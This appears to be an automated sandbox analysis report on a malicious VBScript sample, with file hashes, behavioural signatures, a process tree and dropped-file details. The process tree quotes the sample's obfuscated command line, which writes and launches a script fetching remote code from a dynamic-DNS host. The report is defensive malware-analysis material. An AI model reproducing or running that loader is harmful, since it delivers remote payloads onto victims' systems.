Analysis
-
max time kernel
43s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-es -
submitted
23-06-2022 14:52
Static task
static1
Behavioral task
behavioral1
Sample
27.FICH_33O3LcBJBPsZDE6v.vbs
Resource
win7-20220414-es
Behavioral task
behavioral2
Sample
27.FICH_33O3LcBJBPsZDE6v.vbs
Resource
win10v2004-20220414-es
Behavioral task
behavioral3
Sample
_.exe
Resource
win7-20220414-es
General
-
Target
27.FICH_33O3LcBJBPsZDE6v.vbs
-
Size
7KB
-
MD5
25926cb2b53f3be53b0999621d1f1ccf
-
SHA1
9a073d7bd4b2f730f157f4612551504d16607256
-
SHA256
665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941
-
SHA512
8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exeflow pid process 4 516 WScript.exe 5 516 WScript.exe 6 516 WScript.exe 7 516 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.execmd.execmd.exedescription pid process target process PID 1756 wrote to memory of 1076 1756 WScript.exe cmd.exe PID 1756 wrote to memory of 1076 1756 WScript.exe cmd.exe PID 1756 wrote to memory of 1076 1756 WScript.exe cmd.exe PID 1076 wrote to memory of 1232 1076 cmd.exe cmd.exe PID 1076 wrote to memory of 1232 1076 cmd.exe cmd.exe PID 1076 wrote to memory of 1232 1076 cmd.exe cmd.exe PID 1076 wrote to memory of 1200 1076 cmd.exe cmd.exe PID 1076 wrote to memory of 1200 1076 cmd.exe cmd.exe PID 1076 wrote to memory of 1200 1076 cmd.exe cmd.exe PID 1200 wrote to memory of 2044 1200 cmd.exe cmd.exe PID 1200 wrote to memory of 2044 1200 cmd.exe cmd.exe PID 1200 wrote to memory of 2044 1200 cmd.exe cmd.exe PID 2044 wrote to memory of 516 2044 cmd.exe WScript.exe PID 2044 wrote to memory of 516 2044 cmd.exe WScript.exe PID 2044 wrote to memory of 516 2044 cmd.exe WScript.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execMd /c start C:\Users\Public\L8DPGAESQ5.vbs4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"5⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\L8DPGAESQ5.vbsFilesize
275B
MD56bac93f3f5d256c436d31e9496f33353
SHA1906d675da017b53b3051cca5bf270655d68bc358
SHA256f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6
SHA512ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804
-
memory/516-72-0x0000000000000000-mapping.dmp
-
memory/1076-55-0x0000000000000000-mapping.dmp
-
memory/1200-57-0x0000000000000000-mapping.dmp
-
memory/1232-56-0x0000000000000000-mapping.dmp
-
memory/1756-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmpFilesize
8KB
-
memory/2044-58-0x0000000000000000-mapping.dmp